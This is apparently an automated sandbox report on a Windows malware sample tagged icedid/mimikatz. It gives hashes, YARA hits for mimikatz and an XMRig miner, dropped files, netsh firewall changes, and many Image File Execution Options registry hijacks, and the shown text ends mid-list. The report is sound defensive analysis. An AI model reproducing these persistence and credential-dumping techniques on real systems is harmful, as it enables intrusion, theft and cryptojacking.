Analysis
-
max time kernel
128s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2025 00:31
Behavioral task
behavioral1
Sample
2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
Errors
General
-
Target
2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
eae341b82840ca4a95aaaa10ebaaba65
-
SHA1
b39f531930234491d80e22df1dd1f2defad84551
-
SHA256
b5275e1090979a3958f6db9a455320dc725bb79dd0f093da2c9a542600e9527b
-
SHA512
6f0c6aa7a4f43d500a06f46e333c4477b2fac81519948f84d1a0d5bf4f98b3c7cbfec75db21ce2caa6c55632699279e7be710381777aa07c7d317ae921dc809b
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3680 created 2000 3680 wlifiji.exe 37 -
Xmrig family
-
Contacts a large (20571) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/1092-178-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-182-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-199-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-212-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-225-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-234-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-247-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-497-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-498-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig behavioral2/memory/1092-500-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/384-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/384-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c82-6.dat mimikatz behavioral2/memory/1716-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3136-136-0x00007FF79F2A0000-0x00007FF79F38E000-memory.dmp mimikatz behavioral2/memory/3136-138-0x00007FF79F2A0000-0x00007FF79F38E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts wlifiji.exe File opened for modification C:\Windows\system32\drivers\etc\hosts wlifiji.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wlifiji.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4772 netsh.exe 3524 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 1716 wlifiji.exe 3680 wlifiji.exe 1696 wpcap.exe 1676 regnzlibv.exe 3136 vfshost.exe 1628 bteqliisl.exe 4384 xohudmc.exe 1924 cuwoqc.exe 1092 nfquyl.exe 4896 bteqliisl.exe 4500 bteqliisl.exe 2424 bteqliisl.exe 3852 bteqliisl.exe 2676 bteqliisl.exe 1724 bteqliisl.exe 4712 bteqliisl.exe 2632 bteqliisl.exe 5032 bteqliisl.exe 1308 bteqliisl.exe 1828 bteqliisl.exe 4924 wlifiji.exe 1100 bteqliisl.exe 2100 bteqliisl.exe 4292 bteqliisl.exe 1068 bteqliisl.exe 1832 bteqliisl.exe 4984 kbebvutsd.exe 4924 wlifiji.exe -
Loads dropped DLL 12 IoCs
pid Process 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1696 wpcap.exe 1676 regnzlibv.exe 1676 regnzlibv.exe 1676 regnzlibv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 63 ifconfig.me 64 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F wlifiji.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wlifiji.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\cuwoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F wlifiji.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\cuwoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wlifiji.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wlifiji.exe -
resource yara_rule behavioral2/files/0x0007000000023cd9-134.dat upx behavioral2/memory/3136-136-0x00007FF79F2A0000-0x00007FF79F38E000-memory.dmp upx behavioral2/memory/3136-138-0x00007FF79F2A0000-0x00007FF79F38E000-memory.dmp upx behavioral2/files/0x0007000000023ce4-141.dat upx behavioral2/memory/1628-142-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1628-160-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/files/0x0007000000023ce1-163.dat upx behavioral2/memory/1092-165-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/4896-171-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/4500-175-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-178-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/2424-180-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-182-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/3852-185-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/2676-189-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1724-193-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/4712-197-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-199-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/2632-202-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/5032-206-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1308-210-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-212-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/1828-215-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1100-223-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-225-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/2100-228-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/4292-231-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1068-233-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-234-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/1832-236-0x00007FF6766B0000-0x00007FF67670B000-memory.dmp upx behavioral2/memory/1092-247-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/1092-497-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/1092-498-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx behavioral2/memory/1092-500-0x00007FF6FD4A0000-0x00007FF6FD5C0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\Packet.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\svschost.xml wlifiji.exe File created C:\Windows\yqqdgivv\wlifiji.exe 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe File created C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe wlifiji.exe File opened for modification C:\Windows\ysudwuiub\tluvwvuph\Packet.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\tibe-2.dll wlifiji.exe File created C:\Windows\yqqdgivv\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\exma-1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\xdvl-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\Shellcode.ini wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\mimilib.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\docmicfg.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\docmicfg.xml wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\wpcap.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\coli-0.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\trfo-2.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\docmicfg.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\tucl-1.dll wlifiji.exe File created C:\Windows\yqqdgivv\vimpcsvc.xml wlifiji.exe File created C:\Windows\yqqdgivv\docmicfg.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\AppCapture32.dll wlifiji.exe File opened for modification C:\Windows\ysudwuiub\Corporate\log.txt cmd.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\zlib1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\spoolsrv.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\schoedcl.exe wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\mimidrv.sys wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\cnli-1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\ssleay32.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\vimpcsvc.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\libxml2.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\trch-1.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\ucl.dll wlifiji.exe File created C:\Windows\ysudwuiub\Corporate\vfshost.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\crli-0.dll wlifiji.exe File created C:\Windows\yqqdgivv\schoedcl.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\schoedcl.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\AppCapture64.dll wlifiji.exe File opened for modification C:\Windows\yqqdgivv\wlifiji.exe 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe File created C:\Windows\ysudwuiub\UnattendGC\schoedcl.xml wlifiji.exe File created C:\Windows\ysudwuiub\upbdrjv\swrpwe.exe wlifiji.exe File opened for modification C:\Windows\ysudwuiub\tluvwvuph\Result.txt kbebvutsd.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\posh-0.dll wlifiji.exe File created C:\Windows\ime\wlifiji.exe wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\scan.bat wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\libeay32.dll wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\svschost.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\schoedcl.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\vimpcsvc.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\vimpcsvc.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\svschost.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\spoolsrv.xml wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\vimpcsvc.xml wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\kbebvutsd.exe wlifiji.exe File created C:\Windows\ysudwuiub\UnattendGC\specials\docmicfg.exe wlifiji.exe File created C:\Windows\yqqdgivv\spoolsrv.xml wlifiji.exe File opened for modification C:\Windows\yqqdgivv\svschost.xml wlifiji.exe File created C:\Windows\ysudwuiub\tluvwvuph\ip.txt wlifiji.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2632 sc.exe 4704 sc.exe 3200 sc.exe 3928 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-10_eae341b82840ca4a95aaaa10ebaaba65_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened 